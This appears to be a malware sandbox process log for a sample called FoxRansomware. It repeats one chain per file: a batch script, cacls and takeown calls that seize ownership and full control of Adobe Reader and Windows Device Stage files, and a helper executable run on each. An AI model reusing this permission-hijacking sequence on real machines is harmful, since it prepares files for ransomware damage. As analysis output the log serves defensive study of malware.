C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:2232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:4152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:3804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵
- Modifies file permissions
PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:3388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:2432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:2180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt04.hsp" -nobanner3⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "brt04.hsp" -nobanner4⤵PID:3264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:1668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:3632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:3000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "engphon.env" -nobanner3⤵PID:1568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "engphon.env" -nobanner4⤵PID:3420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:3616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:2308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:2896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:3288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:1604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:3320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:3136
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:4212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "directories.acrodata" -nobanner3⤵PID:4224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "directories.acrodata" -nobanner4⤵PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:2712
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:4284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner3⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "behavior.xml" -nobanner4⤵PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:4384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:4380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:4388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:4448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:4404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_received.gif" -nobanner3⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "forms_received.gif" -nobanner4⤵PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:4516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:4568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:4592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:4412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:4480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "submission_history.gif" -nobanner3⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "submission_history.gif" -nobanner4⤵PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:4672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:4612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵PID:4748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Identity-H" -nobanner3⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "Identity-H" -nobanner4⤵PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:4800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:4676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:4828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:4868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:4824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:4780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:4956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:4728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt32.clx" -nobanner3⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "brt32.clx" -nobanner4⤵PID:5024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:5012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:2856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa.fca" -nobanner3⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "usa.fca" -nobanner4⤵PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:2600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:5096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:4968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:3484
-
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3964)
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4060)
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3192)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1251.TXT" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 5068)
        sOCkujKF.exe -accepteula "CP1251.TXT" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3200)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 2464)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3756)
      cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3108)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 572)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3664)
        sOCkujKF.exe -accepteula "background.png" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2248)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3724)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3368)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2864)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3688)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3584)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3968)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 1544)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 996)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 4028)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3172)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1520)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 2372)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3876)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 1000)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1404)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3836)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3776)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3580)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3760)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 2624)
      cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 1176)
      takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
      - Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe (PID 1020)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3672)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1396)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3640)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3496)
      cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2056)
      takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 3916)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 1240)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 208)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 204)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3532)
      cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 3884)
      takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
  [3] C:\Windows\SysWOW64\cmd.exe (PID 2052)
      C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3808)
        sOCkujKF.exe -accepteula "resource.xml" -nobanner
  [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe (PID 3956)
      sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner

[2] C:\Windows\SysWOW64\cmd.exe (PID 3660)
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  [3] C:\Windows\SysWOW64\cacls.exe (PID 3548)
      cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
  [3] C:\Windows\SysWOW64\takeown.exe (PID 2272)
      takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
      - Modifies file permissions
